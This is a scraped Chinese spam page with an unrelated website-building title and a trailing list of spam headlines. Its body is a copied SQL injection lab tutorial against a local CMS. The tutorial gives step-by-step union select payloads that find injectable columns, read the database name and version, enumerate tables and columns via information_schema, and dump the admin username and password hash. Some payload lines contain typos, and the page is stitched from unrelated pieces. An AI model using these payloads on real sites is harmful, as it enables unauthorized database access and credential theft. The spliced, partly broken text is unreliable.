当前位置: 首页 > news >正文

网站模型怎么做做平团的网站

news 2025/11/15 2:58:49
网站模型怎么做,做平团的网站,wordpress备份博客图片,phpwind wordpress文章目录 联合查询是什么#xff1f;联合查询获取cms账号密码尝试登录 联合查询是什么#xff1f; 适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select 语句#xff0c;该语句会同时执行两条select 语句#xff0c;实现跨库、跨表查询。 必要条件 两… 文章目录 联合查询是什么联合查询获取cms账号密码尝试登录 联合查询是什么 适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select 语句该语句会同时执行两条select 语句实现跨库、跨表查询。 必要条件 两条select 语句查询结果具有相同列数: 对应的列数据类型相同(特殊情况下条件被放松)。 联合查询就是利用SQL语句中的union select语句同时执行两条select语句实现跨表查询的方法。 由于联合查询会将数据库中的两张表按照列数拼接纵向拼接后再进行查询所以要求两条select语句查询的表必须******有相同的列数并且数据类型相同否则命令会报错。 联合查询获取cms账号密码 判断列数 打开cms数据库的网页http://127.0.0.1/cms/show.php?id33用order by命令测试cms网页的列数有多少order by 15正常回显order by 16报错一共有15列。 打开hackbar插件在URL中输入命令测试 在hackbar中输入下面的命令相当于用联合查询语句在数据库中查表。通过让联合查询的第一个select语句查询为false只回显后一个select语句从而获取能回显的表的列数、数据库名字和版本号等信息。 判断回显位置 ?id33 and 12 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15或 ?id-33 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15相当于 select * from table_name where id33 and 12 union select和 select * from table_name where id-33 union select运行结果 语句的回显结果说明只有3列和11列能进行数据库的内容回显 获取数据库名字 将有回显的11列用database函数代替让它回显数据库的名称 ?id-33 union select 1,2,3,4,5,6,7,8,9,10,database,12,13,14,15运行结果 获取数据库版本号 原理同上 ?id-33 union select 1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15运行结果 指定获取元数据数据库中当前数据库存储表名的tables表中的字段information_schema 元数据数据库(存储库名、表名-- tables、列名-- columns) ?id-33 union select 1,2,3,4,5,6,7,8,9,10,hex(group_concat(table_name)),12,13,14,15 from information_schema.tables where table_schemadatabase()因为联合查询中数据类型必须一致所以用hex函数将字符转成数字;where table_schemadatabase指定查询当前数据库的表名也就是cms数据库group_concat()函数将所有表名联合成一个列、一个字符串。 运行结果 将16进制转字符 获得结果 cms_article cms_category cms_file cms_friendlink cms_message cms_notice cms_page cms_users 注意到cms_users这个表里面很可能储存了数据库的用户名和密码。 获取cms_users表的列的字段内容 ?id-33 union select 1,2,3,4,5,6,7,8,9,10,hex(group_concat(column_name)),12,13,14,15 from information_schema.columns where table_schemadatabase() and table_namecms_users运行结果 将16进制转字符 获得结果 userid username password 获取账密 ?id-33 union select 1,2,3,4,5,6,7,8,9,10,comcat(username,0x3a,password),12,13,14,15 from coms_users运行结果 用md5解密后获得账号密码 admin 123456 尝试登录 登录成功
http://www.pierceye.com/news/230998/

相关文章:

  • 梅州市住房和城乡建设局网站东营网站
  • 免费手机端网站模板下载工具windows怎么做网站
  • 新乡网站自然优化本地电脑如何做网站服务器
  • 网站备案是域名备案还是服务器备案辽宁天一建设有限责任公司网站
  • 做网站的软件是什么阿里云官网入口
  • 徐州网站建设服务网络营销方式的优点
  • 建设电影网站点击播放是乱页的建站网站多少钱
  • 网站上传服务器教程交做网贷的网站
  • wordpress网站无法打开wordpress怎么设置跳站外链接
  • 宠物美容网站建设的目的延安网站建设
  • 开发网站如何赚钱网站流量攻击软件
  • 达内网站开发视频教程水利建设专项收入在什么网站上申报
  • php网站后台密码忘记了莆田网站建设推广
  • wordpress typo3seo排名优化哪家好
  • 做pc端网站什么开头参考消息网国内新闻
  • 济南网站开发xywlcn宁波公司注册代理公司
  • 网站怎么找的中国外贸出口网站
  • 个人备案网站可以做商城吗做视频点播网站的要求
  • 那个网站点击率高域名解析大全
  • 做优化排名会不会影响网站速度广州网匠营销型网站建设公司
  • 南京林业大学实验与建设网站如何查询网站备案时间查询
  • 做食品网站有哪些凡科建站做的网站收录慢吗
  • 做平面还有什么素材网站集团网站建设
  • seo网站营销推广公司不错的免费网站建设
  • 怎么做自助交易网站平面设计师工资一般多少钱一个月
  • 网站建设如何运营seoul是什么意思
  • 51CTO学院个人网站开发视频营销策划包括哪些内容
  • 专做排名的网站wordpress样式乱了
  • 网站空间域名维护协议网站备案的意义
  • word可以做网站链接吗网站推广的基本方法有哪些